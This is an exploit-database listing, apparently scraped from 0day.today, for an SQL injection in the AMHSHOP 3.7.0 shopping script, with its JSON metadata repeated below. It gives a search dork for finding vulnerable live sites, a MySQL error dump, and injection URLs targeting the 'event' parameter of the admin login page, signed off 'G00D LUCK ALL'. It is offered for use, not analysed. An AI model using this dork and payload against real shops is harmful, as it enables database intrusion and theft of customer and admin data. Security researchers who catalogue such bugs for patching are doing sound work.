ID 1337DAY-ID-16338 Type zdt Reporter Yassin Aboukir Modified 2011-06-15T00:00:00
Description
Exploit for php platform in category web applications
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Title : AMHSHOP 3.7.0 SQL Injection
[+] Name : AMHSHOP 3.7.0
[+] Affected Version : v3.7.0
[+] Description : it's an arabic Shopping Script [Payable]
[+] Software : http://amhserver.com/37/ & http://www.metjar.com/
[+] Tested on : (L):Vista & Windows Xp and Windows 7
[+] Dork : Powered by AMHSHOP 3.7.0
[+] Date : 14/06/2011
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : Yassin Aboukir
[+] Contact : [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>
[+] Site : http://www.yaboukir.com
[+] Greetz : Th3 uNkn0wnS Team ! & All My friends
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Error:
MySQL
* Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users_login_forgotpassword'' AND user_id = '' LIMIT 1' at line 1
* Error Number:1064
* SQL: SELECT restricted FROM userspermission WHERE page = 'users_login_forgotpassword'' AND user_id = '' LIMIT 1
# we had contacted the owner before and some websites have fixed the bug ;)
[-] Exploit:-
# http://[localhost]/Path/admin/index.php?module=users&page=login&event=[SQL]
# http://[localhost]/Path/admin/index.php?module=users&page=login&event=forgotpassword'
G00D LUCK ALL :)
# 0day.today [2018-01-06] #
{"id": "1337DAY-ID-16338", "bulletinFamily": "exploit", "title": "AMHSHOP 3.7.0 SQL Injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2011-06-15T00:00:00", "modified": "2011-06-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/16338", "reporter": "Yassin Aboukir", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-01-06T03:01:31", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T00:02:47", "value": 6.4}}, "hash": "e8d5637d7e62079d4353b9fa1dcd5c441f7dbd87341ef48b11f9e55671813021", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0ba3b133aa652b14a7034e2aa9e09a8c", "key": "modified"}, {"hash": "baa67e3d77c0bb631d8b2581f761b731", "key": "sourceData"}, {"hash": "a04cb308ca409f4b0749b559a6059d2d", "key": "title"}, {"hash": "b34d0b8a140b79917b703d3ff278421e", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "0ba3b133aa652b14a7034e2aa9e09a8c", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4b6ea3ca76ccaea8c8222a41797b0c44", "key": "href"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "7ef48b1964730ef4b594faf6c5c019d5", "key": "sourceHref"}], "history": [], "href": "http://0day.today/exploit/description/16338", "id": "1337DAY-ID-16338", "lastseen": "2016-04-20T00:02:47", "modified": "2011-06-15T00:00:00", "objectVersion": "1.0", "published": "2011-06-15T00:00:00", "references": [], "reporter": "Yassin Aboukir", "sourceData": "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n[+] Title : AMHSHOP 3.7.0 SQL Injection\r\n[+] Name : AMHSHOP 3.7.0\r\n[+] Affected Version : v3.7.0\r\n[+] Description : it's an arabic Shopping Script [Payable]\r\n[+] Software : http://amhserver.com/37/ & http://www.metjar.com/\r\n[+] Tested on : (L):Vista & Windows Xp and Windows 7\r\n[+] Dork : Powered by AMHSHOP 3.7.0\r\n[+] Date : 14/06/2011\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n[+] Author : Yassin Aboukir\r\n[+] Contact : 01Xp01@Gmail.com<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>\r\n[+] Site : http://www.yaboukir.com\r\n[+] Greetz : Th3 uNkn0wnS Team ! & All My friends\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n[+] Error:\r\n MySQL\r\n \r\n * Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users_login_forgotpassword'' AND user_id = '' LIMIT 1' at line 1\r\n * Error Number:1064\r\n * SQL: SELECT restricted FROM userspermission WHERE page = 'users_login_forgotpassword'' AND user_id = '' LIMIT 1\r\n \r\n \r\n \r\n# we had contacted the owner before and some websites have fixed the bug ;)\r\n \r\n[-] Exploit:-\r\n \r\n # http://[localhost]/Path/admin/index.php?module=users&page=login&event=[SQL]\r\n # http://[localhost]/Path/admin/index.php?module=users&page=login&event=forgotpassword'\r\n \r\n \r\nG00D LUCK ALL :)\r\n\r\n\n\n# 0day.today [2016-04-19] #", "sourceHref": "http://0day.today/exploit/16338", "title": "AMHSHOP 3.7.0 SQL Injection Vulnerability", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:02:47"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "9332917a7a1dea820d6dee6c46d6d1f3"}, {"key": "modified", "hash": "0ba3b133aa652b14a7034e2aa9e09a8c"}, {"key": "published", "hash": "0ba3b133aa652b14a7034e2aa9e09a8c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b34d0b8a140b79917b703d3ff278421e"}, {"key": "sourceData", "hash": "c4786db2efa48b72e20282af228890a7"}, {"key": "sourceHref", "hash": "aa3c32fbb27d801a5882f39ebead65f9"}, {"key": "title", "hash": "a04cb308ca409f4b0749b559a6059d2d"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "b8b048273273aff84c24eb4dc231d16a682269952a6eb87a27de453f2ae49a5b", "viewCount": 0, "enchantments": {"vulnersScore": 9.0}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/16338", "sourceData": "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n[+] Title : AMHSHOP 3.7.0 SQL Injection\r\n[+] Name : AMHSHOP 3.7.0\r\n[+] Affected Version : v3.7.0\r\n[+] Description : it's an arabic Shopping Script [Payable]\r\n[+] Software : http://amhserver.com/37/ & http://www.metjar.com/\r\n[+] Tested on : (L):Vista & Windows Xp and Windows 7\r\n[+] Dork : Powered by AMHSHOP 3.7.0\r\n[+] Date : 14/06/2011\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n[+] Author : Yassin Aboukir\r\n[+] Contact : [email\u00a0protected]<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>\r\n[+] Site : http://www.yaboukir.com\r\n[+] Greetz : Th3 uNkn0wnS Team ! & All My friends\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n[+] Error:\r\n MySQL\r\n \r\n * Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users_login_forgotpassword'' AND user_id = '' LIMIT 1' at line 1\r\n * Error Number:1064\r\n * SQL: SELECT restricted FROM userspermission WHERE page = 'users_login_forgotpassword'' AND user_id = '' LIMIT 1\r\n \r\n \r\n \r\n# we had contacted the owner before and some websites have fixed the bug ;)\r\n \r\n[-] Exploit:-\r\n \r\n # http://[localhost]/Path/admin/index.php?module=users&page=login&event=[SQL]\r\n # http://[localhost]/Path/admin/index.php?module=users&page=login&event=forgotpassword'\r\n \r\n \r\nG00D LUCK ALL :)\r\n\r\n\n\n# 0day.today [2018-01-06] #"}
